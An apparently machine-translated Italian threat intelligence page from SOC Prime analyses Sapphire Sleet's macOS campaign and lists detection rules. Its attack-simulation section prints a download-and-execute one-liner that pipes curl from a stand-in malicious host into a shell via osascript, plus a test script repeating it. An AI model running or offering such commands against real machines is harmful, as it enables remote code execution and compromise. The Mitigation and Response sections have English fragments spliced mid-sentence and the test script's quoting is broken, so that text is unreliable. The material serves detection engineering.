SOC Prime Bias: Critico

17 Apr 2026 15:42 UTC

Analisi dell’intrusione di Sapphire Sleet su macOS dall’adescamento al compromesso

Author Photo
SOC Prime Team linkedin icon Segui
Analisi dell’intrusione di Sapphire Sleet su macOS dall’adescamento al compromesso
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Sintesi

Microsoft Threat Intelligence ha segnalato una campagna focalizzata su macOS attribuita all’attore nordcoreano patrocinato dallo stato Sapphire Sleet. L’operazione si basa sull’ingegneria sociale per persuadere gli obiettivi a eseguire file AppleScript dannosi presentati come un aggiornamento legittimo dell’SDK di Zoom. Una volta eseguito, lo script recupera payload aggiuntivi tramite curl and osascript, espandendo l’intrusione in più fasi. Il malware è progettato per rubare credenziali, dati dei portafogli di criptovaluta e altre informazioni sensibili, oltre a bypassare le protezioni di sicurezza native di macOS per rimanere attivo sui sistemi compromessi.

Indagine

L’indagine descrive una catena di infezione a più fasi che inizia con un .scpt file esca e continua attraverso una sequenza di curl-a-osascript download di payload. I ricercatori hanno identificato diversi componenti di backdoor, tra cui com.apple.cli, un binario di servizi, icloudz, e com.google.chromes.updaters. Gli attori delle minacce sono stati anche osservati manomettere il database TCC di macOS per ottenere permessi di AppleEvents, utilizzando tecniche di caricamento riflessivo del codice e stabilendo persistenza tramite un demone di lancio. L’attività di esfiltrazione si basava su stringhe user-agent personalizzate e comunicazioni tramite l’API di Telegram Bot.

Mitigazione

Apple ha già rilasciato aggiornamenti per Safe Browsing e XProtect per interrompere l’infrastruttura della campagna e i componenti del malware. Microsoft raccomanda di bloccare l’esecuzione dei .scpt file, limitare pipe non sicure, monitorare i cambiamenti non autorizzati al database TCC e auditare le installazioni di daemon di lancio per voci sospette. Gli utenti dovrebbero essere anche avvertiti riguardo inviti a aggiornamenti software non richiesti e consigliati di non fornire credenziali tramite dialoghi o script inaspettati. curl pipelines, monitoring for unauthorized TCC database changes, and auditing launch daemon installations for suspicious entries. Users should also be warned about unsolicited software update prompts and advised not to provide credentials through unexpected dialogs or scripts.

Risposta

I difensori dovrebbero rilevare l’esecuzione di AppleScript dannosi, stringhe user-agent anormali e connessioni in uscita a domini noti di comando e controllo. Qualsiasi binario e daemon di lancio identificato dovrebbe essere immediatamente messo in quarantena o rimosso, seguito da reimpostazioni delle credenziali per gli utenti interessati e validazione dell’integrità del database TCC. Gli investigatori degli incidenti dovrebbero anche eseguire analisi forensi sui reperti di sistema raccolti e ripristinare i dati impattati da backup puliti ove necessario. curl user-agent strings, and outbound connections to known command-and-control domains. Any identified binaries and launch daemons should be quarantined or removed immediately, followed by credential resets for affected users and validation of TCC database integrity. Incident responders should also perform forensic analysis on collected system artifacts and restore impacted data from clean backups wherever necessary.

Flusso di Attacco

Rilevamenti

Possibili Comunicazioni C2 su HTTP a IP Diretto con Porta Insolita (tramite proxy)

Team di SOC Prime
17 Apr 2026

Possibile Esecuzione tramite uso di chmod e nohup in Singolo Comando (tramite cmdline)

Team di SOC Prime
17 Apr 2026

Validazione Credenziali MacOS tramite Dscl Authonly (tramite cmdline)

Team di SOC Prime
17 Apr 2026

Tentativo di Esecuzione Sospetta di Curl [MacOS] (tramite cmdline)

Team di SOC Prime
17 Apr 2026

Archivio Creato nella Cartella Temporanea di MacOS (tramite file_event)

Team di SOC Prime
17 Apr 2026

Permessi Pericolosi per un Binario/Script/Cartella impostati (tramite cmdline)

Team di SOC Prime
17 Apr 2026

Indicatori di Compromissione (HashSha256) per rilevare: Dissezionare l’intrusione su macOS di Sapphire Sleet dall’esca al compromesso

Regole AI di SOC Prime
17 Apr 2026

Indicatori di Compromissione (SourceIP) per rilevare: Dissezionare l’intrusione su macOS di Sapphire Sleet dall’esca al compromesso

Regole AI di SOC Prime
17 Apr 2026

Indicatori di Compromissione (DestinationIP) per rilevare: Dissezionare l’intrusione su macOS di Sapphire Sleet dall’esca al compromesso

Regole AI di SOC Prime
17 Apr 2026

Rilevamento di Comunicazioni C2 Sapphire Sleet [Connessione di Rete Linux]

Regole AI di SOC Prime
17 Apr 2026

Rilevamento di Esecuzione di AppleScript con Piping di Curl su macOS [Creazione di Processo Linux]

Regole AI di SOC Prime
17 Apr 2026

Esecuzione Simulazione

Prerequisito: Il controllo preliminare di telemetria e baseline deve essere superato.

Motivo: Questa sezione dettaglia l’esecuzione precisa della tecnica avversaria (TTP) progettata per attivare la regola di rilevamento. I comandi e il narrativo DEVONO riflettere direttamente i TTP identificati e mirano a generare la telemetria esatta prevista dalla logica di rilevamento.

  • Narrativa e Comandi di Attacco:
    Un avversario ha ottenuto uno script in stile PowerShell dannoso ospitato su un server remoto. Per evitare di creare un binario standalone, utilizzano l’interprete nativo di AppleScript (osascript) e pipe un curl download direttamente nel interprete, realizzando un “scarica ed esegui” in un solo comando. Questo corrisponde alla regola’s osascript + curl schema.

    # One-liner malizioso che dovrebbe attivare la regola
    osascript -e 'do shell script "curl -s https://malicious.example.com/payload.sh | sh"'

    La linea di comando contiene sia osascript and curl, quindi la condizione della regola Sigma (selection_osascript e selection_curl) si valuta come vero.

  • Script di Test di Regressione:

    # simulate_osascript_curl.sh
    # Scopo: Riprodurre la telemetria esatta che dovrebbe attivare la regola di rilevamento.
    set -e
    
    # Definire un payload innocuo per sicurezza (echo invece di codice effettivamente dannoso)
    MALICIOUS_URL="https://example.com/benign_payload.sh"
    
    # Creare un payload benigno fittizio che semplicemente stampa un messaggio.
    # In un vero test di red-team ospiteresti un vero script; qui lo manteniamo sicuro.
    curl -s -o /tmp/benign_payload.sh "$MALICIOUS_URL" || true
    
    # Eseguire lo script AppleScript con curl pipe in un comando shell.
    osascript -e "do shell script "curl -s $MALICIOUS_URL | sh""
  • Comandi di Pulizia:

    # cleanup_osascript_curl.sh
    # Rimuovere eventuali file temporanei e terminare processi vaganti.
    rm -f /tmp/benign_payload.sh
    pkill -f "osascript -e"